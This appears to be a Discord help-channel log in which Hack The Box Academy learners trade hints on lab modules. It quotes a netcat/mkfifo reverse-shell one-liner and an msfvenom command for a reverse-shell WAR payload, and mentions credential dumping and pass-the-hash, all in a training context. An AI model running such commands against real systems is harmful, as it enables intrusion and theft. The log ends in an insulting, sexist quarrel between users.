guys idk where i should ask this question so i'll do it here pardon me.

whats hackthebox font?

?

You mean the font on htb academy?

ye

Use dev-tools/inspector

Looks to be neue-haas-unica, sans-serif

¯_(ツ)_/¯

ok tyy

hi everyone i would need some help here. iam at the https://academy.hackthebox.com/module/158/section/1426#questionsDiv section and i have a question about the proxychain.conf file . iam using kali linux . but when i try to run the commands in the module i get this [proxychains] DLL init: proxychains-ng 4.16. Has someone encounterd something like this before ? i cannot pivot to any machines.

proxychains4.conf

yes sir i tried that instead too still just getting timeouts

Do you have the pivot running the required port to proxy?

can I get a nudge for the initial injection point for SQLMap Skills Assessment?

Or just a hint, been over this site what feels like a million times and can't see it

I.e. do you still have the ssh session running

yes

intercept the request when adding an item to cart

thank you

I did try this before but nothing happened. Now after trying it for 10 times on the same item it finally worked. Thanks

Im losing my mind on AD Enumeration & Attacks - Skills Assessment Part I Q6: Submit this user's cleartext password. I found the user and the hash but I cannot crack it

strange

you don’t need to crack it

I just thought it was intentional, as in only the certain things functioned on the site intentionally as it's just for testing. Turns out just jank

What do I need to do then? Its asking for clear text?

find other ways to dump it?

the users pass has been stored insecurely

😉

ok I found another way to dump and got clear text but there is nothing tying it to the user I found? Is this supposed to just be a pw reuse attempt?

Uh it just says the user and pass afaik

At least with secretsdump

hmm can I dm you and show you how I did it and maybe see how you did it? @analog dock

I just used this

hi there, any hint about how to obtain the shell for the initial access to target machine into LPE Assessment?

so far I had enumerated the server and I found a Tomcat server {/manager & host-manager} are accessible but not common creds are configured, I tried with no success a login enum via MSF module

also, I ran a nmap script scan with no valuable info

common creds got me initial access😉

no way, did u use the HackTricks?

no i did not

ok.

linux priv esc/skills assessment is it possible to get flag5 using tomcat?

dude, I'm using these creds, https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown with no success....

how long did u do the assessment?, could be those creds had being changed?

how long have i been doing the assessment?

pretty sure creds dont get changed

sorry I was asking to Wnted...

same

didn’t bruteforce tomcat btw

holly molly

ok.

moving to manual, thz

creds search tomcat

I did it manually 1 by 1 and none of them worked for me

I'm not sure how to get to that

linux priv esc/skills assessment...
msf6 exploit(multi/http/tomcat_mgr_deploy)
[-] Execution failed on HSrpydkGb [500 ]

I also get 500 error when i upload war file onto tomcat... help please

SERVER-SIDE ATTACKS

Blind SSRF Exploitation Example

The target is vulnerable to blind SSRF. Leverage this blind SSRF vulnerability to interact with internal.app.local and achieve remote code execution against the internal service listening on port 5000, as you did in the previous section. Submit the kernel release number as your answer (Answer format: X.X.X-XX)

I can't solve this in the way that the module describes because it doesn't contain the same web app or anything similar. It literally contains the web page of the previous section "Bad App"

Can anyone help?

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14,110 1234 > /tmp/f" >> monitor.sh can anyone please help me walkthrough and understand what this code snippet for python reverse shell is doing? is this even the correct way to do it for nibbles.?sorry im a script kiddy

this isn't a python revshell, it's bash

im using python shell to enter thi into monitor.sh file

but yes im sry that was invcorrect

doesnt matter

will it work with ncat?

you're not really using a python shell - python was just used to give you a more interactive environemtn

right

there's a comma instead of a period

10.10.14,110

i caught that in my attempts when i added my ip and port

but it still didnt work

i copied this from a website that was a walkthrough

the best one ive seen and used but still

do you mean the nibbles walkthrough from the getting-started module?

yes

thats where im at

ok so a semicolon indicates the end of a set of commands

you can do man <command> to find out what each individual command does

oh okay! i didnt think of that

but in short: it creates a pipeline that's redirected to a privileged bash shell which then connects to your IP at PORT (2>&1 is a bash redirect stderr+stdout iirc)

the >> appends it to the monitor.sh (a bash file)

when i add this to monitor.sh does that activate it? bc i have my terminal set nc -nlvp <PORT> and nothing happens

are you already using that port for your initial connection?

if so you'll need to adjust the port

:)

hmm idk it was port 1234

"it was" don't just copy/paste

i understand

for your initial connection command to the user: did you listen on 1234

if so you'll need to adjust the port on your revshell command to listen on a different port

i dont know ill have to do it all again and be mindful of ports. but now i know where i could have gone wrong

nc ip port

thank you

that's the basic schema of netcat

nc ip port?

for using netcat (nc) to connect to a port you provide it 2 arguments; an IP and a PORT

gotcha. these walkthrough use shortcuts that convalute whats going on

the getting-started module isn't really going to teach you a whole bunch

it's just to get your feet wet

its really frustrated me

but tbh you should do the Information Security Foundations Path or at least Linux Fundamentals

i understand all of it but i just dont get results from th terminal

i am doing linux fundamentals. almost done and i really enjoyed that module

i plan on getting into soc analyst stuff

this is what that module is expecting as pre-requisites

i got some of those completed ill go back and see which ones i dont

btw you need to run monitor.sh as sudo

:)

so sudo echo etc...

no

sudo -l?

sudo ./monitor.sh

ahhhh!

i get it

that was not in the walkthrough

i assure you it is

ok let me reread it

it's right after it tells you to echo the command

it shows he got access to the root before he sudos

nope

gotcha

he did not have access to root before sudo

gotcha

im excited im gonna get this nopw\

sudo -l lists all commands that the user can run with sudo privs

so you have to run monitor.sh with the echo in it

do me a favor

after doing the echo... >> monitor.sh

ok

do tail -n 3 monitor.sh

and you'll see the command added at the end

ok

after that it's really just as simple as sudo monitor.sh

it makes perfect sense

i knw there was somehting i was missing. thank you for the help

you just had the puzzle piece upside-down

there's a SOC Analyst Pre-requisite path btw

whats better nmap or metaspooit and for what do people use such as programs ?

they both perform functionally different things

nmap is good for general querying of an IP for common (or all) ports
metasploit is just basically a repository of known exploits for existing CVEs and such

(there's a fair bit more you can do)

but for the most part msfconsole is mostly used by people who don't care to read how a PoC exploit works

im excited about sherlock in the future after this path is completed further

what are cves ?

use google

this channel is for assistance with academy modules; not general chatter

sry

if you want a gen chat read #welcome on how to access to more of the server

alrighr thanks

msf6 exploit(multi/http/tomcat_mgr_deploy) > exploit

[-] Execution failed on cGGZnd5T2T4iiCj92n15 [500 ]
anyone know whow to fix this? I cant find one

make sure your options are set correctly

is this the Shells/Payloads live engagement?

i tried my options every which way

this is for flag5 in linux priv esc/ skills assessment

ah

haven't touched that yet ¯_(ツ)_/¯

😦

500 error is odd though

i get it when i run my war file in tomcat

and in msf

do it yourself, much easier and less things can go wrong

then you might need to use a diff vpn region; could just be that it's being dumb - are you using pwnbox or your own vm

my own

iv run out forums to read and try

have you tried logging on to tomcal in the browser?

yes

im logged in

uploaded war file

warfile gives 500 or 404 error

are you catching it with a listener

yes

nothing

are the lhost and ports right?

RHOSTS 10.129.134.239 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)

LHOST 10.10.15.40 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

wait are you doing it through metasploit or through the browser?

doing both

both wont work

i can get a rev shell on tomcat but i can upgrade it

can get a revshell

to escalate to root so im using msf to rev shell

If you can get a revshell what’s the problem

^

webshell

using msf won't magically make it an escalated shell

It’s not like msf will magically give you root

upgrade it as in upgrading to meterpreter?

i have a webshell on tomcat and can use commands like cat and ls

but nothing else works

Do you have a web shell or a revshell

webshell

https://tenor.com/view/do-something-comeon-stickman-bored-gif-22722853

Why don’t you just upload a revshell?

i think i did

msfvenom -p java/shell_reverse_tcp lhost=10.10.15.40 lport=4321 -f war -o pwn.war

If you think you did it wouldn’t be a web shell would it

And you set up a listener and then go to there?

And you get a call back?

okay i think i missed something, let me try thanks

??

Your payload is a revshell, not a webshell

I am actually confused

If you set up a listener and get a callback when you browse to it, it’s a revshell

this revshell is incorrect

java/jsp_shell_reverse_tcp

incorrect payload == skill issue

i had to double-check with the example from the shells & payloads module

thanks 🙂

but as soon as i saw the payload option it just didn't look right to me lol

Common applications literally gives the msfvenom command

¯_(ツ)_/¯

Yeah something was off

i was like that looks almost correct

thanks

i just couldn't remember if it was java/jsp/shell_reverse_tcp or java/jsp_shell_reverse_tcp

brain is fried

the reason it ticked me was the fact that it's Tomcat

which uses well, jsp

Yeah I knew the payload was literally in the attacking tomcat section from attacking common applications

neat: i just referred to shells/payloads since the live engagement has something similar

@analog dock

Using INLANEFREIGHT.LOCAL as the domain could this be the issue?

are you entering the user and pass right?

I am copying and pasting the pass I will check user...

I use secretsdump.py, not sure if that makes a difference, but it seems like your login is invalid so perhaps you don’t paste the pass correctly

you can use '<Domain>/<Username>:<Password>@<dc>'

Okay, I will try when I try secretsdump.py it throws errors bc of my python setup

This path is completed

I think they meant when they get further in the path?

Ahh

But it can be vague in this case

@next bronze is it not the same cleartext password found earlier in the module?

ah

Try putting it in '

use forward slash, backslash is an escapte character in bash

The pass

that too

Okie dokie, pray for me! lol

you're actually passing INLANERIGHT.LOCALt*** as the user

Thanks guys huge help

Escape characters are the bane of my existence this is not the first time

Could I have used '\' as well?

You'd need to double it

omg Discord just cancelled it i mean two backslashes in a row

yes 2 of them works edit: no it doesn't

Yeah discord uses markdown and \ is an escape character

It's how I get away with telling people to wrap things in backticks
`like this`
like this

I don't think impacket does \\, you need to use /

I have a 60% keyboard and backticks are not working right now which is a brand new issue lol

things like an user being able to run as sudo openssl are considered a flaw?

do we have to report them?

¯_(ツ)_/¯

because the real flaw was the RCE to get there

I wouldn't but it depends

on what

Defense in depth methodology

Just because something isn't exploitable without an attack chain to get to that point doesn't mean it shouldn't get fixed

some remediation note

would be enough

The room across from me is on fire, but my door is closed and I'm not in that room so it's not a problem.

🔥 🚪

SERVER-SIDE ATTACKS

Blind SSRF Exploitation Example

The target is vulnerable to blind SSRF. Leverage this blind SSRF vulnerability to interact with internal.app.local and achieve remote code execution against the internal service listening on port 5000, as you did in the previous section. Submit the kernel release number as your answer (Answer format: X.X.X-XX)
I can't solve this in the way that the module describes because it doesn't contain the same web app or anything similar. It literally contains the web page of the previous section "Bad App"

Can anyone help?

Guys im doing the dancing starting point box and i'm at the very end, i'm following the walkthrough completely and it wont work, it either says I dont have enough

#starting-point read #welcome to find out how to access

The first channel it says I dont have access to it

Hence the second part of my message

Reading comprehension is hard, I know

@next bronze I tried this to get the admin flag but it's still the flag for MS01. Is this not the right way to do it I am guessing?

dc01 is not the domain, where are you running mimikatz on?

I am running it on the MS01 machine

when you use ::pth with mimikatz, it opens another terminal with the user you pth as, but the terminal is still running in the same machine, just that the user is different, you don't just magically get a shell on another computer

Okay I should use psexec then?

but since the user is different, you can PSremote, or access the smb as that user to a remote machine, DC, in this case

You’re on the last question?

Yes

You got the hash from secretsdump, why don’t you just proxychains evilwinrm

I misunderstood so you have to be a stuck up lil bitch about it? okay

I will try that or @next bronze tip, thanks!

there are many ways to do things in AD

You misunderstood him literally saying ‘read #welcome to find out how to access’?

You sound like the stuckup bitch thinking you know everything loser

True that

ego so fragile gunna cry about having to read

Don't need to be so hostile my guy.

wah wah

But I get it, Woman bad, REEEEEEE

You came for me first and since I said something back I did it because you're a woman? And my comprehension skills are bad?

Oh boy

What did you expect, for me to just let you insult me? nahh

timothy doesn't get enough attention at home 😢

if youre this thin skin consider a different field. It requires higher mental fortitude than this

You were the one insulting

Because my initial comment explained how to find out how to access the "no access" channel

yes

This guy must have a Security+ cert knowing so much lol